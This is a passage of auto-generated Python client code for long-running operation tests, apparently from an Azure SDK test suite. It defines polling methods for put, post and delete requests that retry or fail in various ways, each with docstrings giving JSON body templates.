:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post_async_retry_succeeded_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_async_no_retry_succeeded(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running post request, service returns a 202 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post_async_no_retry_succeeded_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_async_retry_failed(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""Long running post request, service returns a 202 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post_async_retry_failed_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_async_retrycanceled(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""Long running post request, service returns a 202 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post_async_retrycanceled_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
class LRORetrysOperations(object):
"""LRORetrysOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
@distributed_trace
def begin_put201_creating_succeeded200(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 500, then a 201 to the initial request, with an
entity that contains ProvisioningState=’Creating’. Polls return this value until the last poll
returns a ‘200’ with ProvisioningState=’Succeeded’.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200, 201
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put201_creating_succeeded200_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_relative_retry_succeeded(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 500, then a 200 to the initial request, with an
entity that contains ProvisioningState=’Creating’. Poll the endpoint indicated in the
Azure-AsyncOperation header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_relative_retry_succeeded_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_provisioning202_accepted200_succeeded(self, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running delete request, service returns a 500, then a 202 to the initial request, with an
entity that contains ProvisioningState=’Accepted’. Polls return this value until the last poll
returns a ‘200’ with ProvisioningState=’Succeeded’.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200, 202
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_provisioning202_accepted200_succeeded_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete202_retry200(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 500, then a 202 to the initial request. Polls
return this value until the last poll returns a ‘200’ with ProvisioningState=’Succeeded’.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete202_retry200_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_relative_retry_succeeded(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 500, then a 202 to the initial request. Poll the
endpoint indicated in the Azure-AsyncOperation header for operation status.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_async_relative_retry_succeeded_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post202_retry200(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""Long running post request, service returns a 500, then a 202 to the initial request, with
'Location' and 'Retry-After' headers, Polls return a 200 with a response body after success.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post202_retry200_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_async_relative_retry_succeeded(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""Long running post request, service returns a 500, then a 202 to the initial request, with an
entity that contains ProvisioningState=’Creating’. Poll the endpoint indicated in the
Azure-AsyncOperation header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post_async_relative_retry_succeeded_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
class LROSADsOperations(object): # pylint: disable=too-many-public-methods
"""LROSADsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
@distributed_trace
def begin_put_non_retry400(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 400 to the initial request.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200, 201
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_non_retry400_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_non_retry201_creating400(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a Product with 'ProvisioningState' = 'Creating' and
201 response code.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200, 201
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_non_retry201_creating400_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_non_retry201_creating400_invalid_json(
self, product: JSONType = None, **kwargs: Any
) -> LROPoller[JSONType]:
"""Long running put request, service returns a Product with 'ProvisioningState' = 'Creating' and
201 response code.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200, 201
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
